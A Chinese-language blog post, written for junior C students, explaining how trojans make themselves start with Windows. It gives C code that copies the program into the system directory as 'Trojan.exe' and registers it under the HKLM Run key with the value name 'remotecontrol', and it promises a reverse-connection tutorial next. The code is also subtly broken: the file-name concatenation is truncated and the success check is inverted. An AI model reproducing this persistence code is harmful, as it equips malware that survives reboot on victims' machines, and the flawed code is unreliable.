实现“老木马”关键技术之一---------自启动

好久没写篇文章了，这么长时间学的知识都零零碎碎的。不知道该怎么总结下。今天写了个自启动的代码，其实没啥含量就是几个api,就完了，还是用C写的，就还是写给学C的大一大二学弟们看看。C还是能处理事情的，这其实只是个实现在启动的代码，是以前的老木马才使用的方法了，杀毒软件会拦截得到的，所以要用最新的方法才行，但是最新的方法呢，这个·········我是不知道了

木马中的自启动呢，就是随电脑启动而启动。自启动方式目前俺就知道3个，一个是修改win.ini配置文件，一个是修改system.ini配置文件，还有一个就是修改注册表。好像直接把程序设置到启动组也可以哦······

下面给出的是修改注册表的代码·····

编译环境VC6.0

编译系统xp sp3

#include <windows.h>
#include <stdio.h>

void main()
{
    char * temp = NULL; 
    char TempPath[MAX_PATH] = "";
    char * ChangeName = "\\Trojan.exe";
    
    //确定windows系统目录
    GetSystemDirectory(TempPath,MAX_PATH);
    temp = TempPath;
    temp = strncat(temp,ChangeName,sizeof(ChangeName));    
    int len = strlen(temp);

    // 把程序复制到系统目录并更名为“Trojan.exe¡”
    CopyFile("autoboot.exe",temp,FALSE);    //第三个参数是当目录中有同名文件的话，会直接覆盖，相反则不会。

    HKEY hKey;            // 设置注册表中的相关路径
    LPCTSTR SetData = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    if (0 == RegOpenKeyEx(HKEY_LOCAL_MACHINE,SetData,0,KEY_WRITE,&hKey))
    {
        if (!(RegSetValueEx(hKey,"remotecontrol",NULL,REG_SZ,LPBYTE(temp),len)))    //第二个参数是设置值的名字
        {
            exit(-1);
        }
    }
    RegCloseKey(hKey);

}

程序运行后

看截图吧

实现起来不是很难吧，呵呵·····下次会给大家分享反向链接如何实现的·········